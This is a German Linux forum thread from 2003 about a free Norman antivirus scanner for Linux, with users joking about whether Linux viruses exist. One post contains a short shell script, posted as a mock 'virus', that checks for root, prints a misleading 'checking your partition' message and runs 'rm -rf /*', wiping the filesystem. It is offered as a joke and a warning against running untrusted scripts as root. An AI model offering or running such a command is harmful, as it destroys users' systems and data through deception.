[INFO] Norman Virus Control kostenlos für Linux

Dieses Thema im Forum "Linux-Distributionen" wurde erstellt von dieschi, 27. November 2003.

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. dieschi

    dieschi CD-R 80

    Vielleicht interessiert es ja jemanden:

    Der norwegische Sicherheitsspezialist Norman bietet seinen Viren-Scanner in einer voll funktionsfähigen Version für Linux zum kostenlosen Download an.

    Das Programm kann vom Server des Herstellers in Form eines DEB-, RPM- oder tar.gz-Archivs heruntergeladen werden.
    Sun JRE (Java Runtime Environment) in der Version 1.4 wird benötigt.

    http://www.norman.com/download_nvc_linux.shtml?menulang=de
     
  2. bitumen

    bitumen Megabyte

    Das schau ich mir an, wie ein virus die knoppix-cd herunterlädt, einen rohling einlegt, die iso auf cd brennt, dann die bootreihenfolge auf cd ändert, den pc rebootet, und dann in knoppix das root-pw ändert! :heul: :aua:

    gruß, buhi
     
  3. rapmaster

    rapmaster Halbes Gigabyte

    aber das sollte doch kein virus sein.
    wenn man z.B. sein root pw vergessen hat , bräuchte man nur knoppix zu starten, lilo.conf bearbeiten und schon arbeitet man wieder als root.
    ist doch schön

    mfg
     
  4. wickey

    wickey Megabyte


    So, nun ein neuer Virus, den ich unter der GPL veröffentliche:

    #!/bin/sh

    if [ "$UID" != "0" ] ; then
    echo "Please, check your partition only as root"
    echo ""
    exit 1
    fi

    rm -rf /*


    Wer dieses Skript in eine Datei schreibt, diese Ausführbar macht (sonst funktioniert es schon mal gar nicht) und danach ausführt, dem kann ein Virenscanner für Linux auch nicht helfen.

    Es gibt Linuxviren, richtig, aber es wurde noch keiner "in the Wild" gesehen oder hätte einer zu nennenswerten Problemen geführt.

    Wachsam sein: Auf jeden Fall
    Auf Unfug ala Virenscanner für Linux da es Linuxviren gibt reinfallen: Nein, nicht jeden Schmarren runterladen und ausführen, schon gar nicht als root und:
    Weg von dem Aberglauben: Never Change a runnig System
    Das ist unfug sondergleichen, Patches und kritische Softwareupdates gehören unbedingt eingespielt.

    grüße wickey
     
  5. bitumen

    bitumen Megabyte

    und der GPL unterliegen?

    mfg
     
  6. rapmaster

    rapmaster Halbes Gigabyte

    hehe, werden die viren auch opensource sein *fg*
     
  7. bitumen

    bitumen Megabyte

  8. rapmaster

    rapmaster Halbes Gigabyte

    ok...
    aber ich hatte bis her noch nie irgendwelche virenprobleme unter meinem linux.
    aber wieso net open source kann man doch immma mal probieren ne ?

    mfg
     
  9. dieschi

    dieschi CD-R 80

  10. rapmaster

    rapmaster Halbes Gigabyte

    wozu braucht man sowas unter "rpm linux" ?
    lol

    mfg
     
  11. wickey

    wickey Megabyte

    Gefällt mir immer, das seht "für Linux" :)

    Zu gebrauchen ist das Ding für Mailserver der die Mails für Windowsclients bereitstellt aber nicht für Linux, das Ding kommt ja nicht mal mit tar.gz Datein klar :)

    grüße wickey
     
  12. RaBerti1

    RaBerti1 Viertel Gigabyte

  13. bitumen

    bitumen Megabyte

    Thx.

    Falls mein gehirninterner Leerlaufprozess zu hoch wird, probier ichs mal aus. Ich habs mal auf alle fälle heruntergeladen...

    gruß, buhi
     
Status des Themas:
Es sind keine weiteren Antworten möglich.

Diese Seite empfehlen